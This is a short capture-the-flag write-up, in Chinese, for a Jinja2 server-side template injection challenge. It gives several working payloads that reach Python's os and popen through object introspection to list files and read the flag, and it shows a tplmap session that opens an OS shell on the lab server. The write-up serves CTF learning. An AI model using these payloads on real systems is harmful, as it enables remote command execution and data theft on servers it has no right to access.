题目描述

来源：XTCTF

Solution

手工注入

打开网页，提示是 Python 模板注入：

我们可以测试一下：

http://111.200.241.244:58124/{{2+3}}

后端把{{2 + 3}}的值给计算出来，放到结果里了。我们使用 Payload 读取目录（选下列任一即可）：

http://111.200.241.244:58124/{{().__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
http://111.200.241.244:58124/{{{}.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('commands').getstatusoutput('ls')}}
http://111.200.241.244:58124/{{{}.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__.__import__('os').popen('ls').read()}}
http://111.200.241.244:58124/{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}

读取文件：

http://111.200.241.244:58124/{{[].__class__.__base__.__subclasses__()[40]('fl4g').read()}}

Tqlmap 自动化注入

输入下列命令：

┌──(cheery㉿kali)-[~/Desktop/Tools/tplmap]
└─$ py tplmap.py -u "http://111.200.241.244:58124/*" --os-shell
Tplmap 0.5
    Automatic Server-Side Template Injection Detection and Exploitation Tool
Testing if URL parameter 'url' is injectable
Smarty plugin is testing rendering with tag '*'
Smarty plugin is testing blind injection
Mako plugin is testing rendering with tag '${*}'
Mako plugin is testing blind injection
Python plugin is testing rendering with tag 'str(*)'
Python plugin is testing blind injection
Tornado plugin is testing rendering with tag '{{*}}'
Tornado plugin is testing blind injection
Jinja2 plugin is testing rendering with tag '{{*}}'
Jinja2 plugin has confirmed injection with tag '{{*}}'
Tplmap identified the following injection point:
  URL parameter: url
  Engine: Jinja2
  Injection: {{*}}
  Context: text
  OS: posix-linux2
  Technique: render
  Capabilities:
   Shell command execution: ok
   Bind and reverse shell: ok
   File write: ok
   File read: ok
   Code evaluation: ok, python code
Run commands on the operating system.
posix-linux2 $ ls
fl4g
index.py
posix-linux2 $ cat fl4g
ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}
posix-linux2 $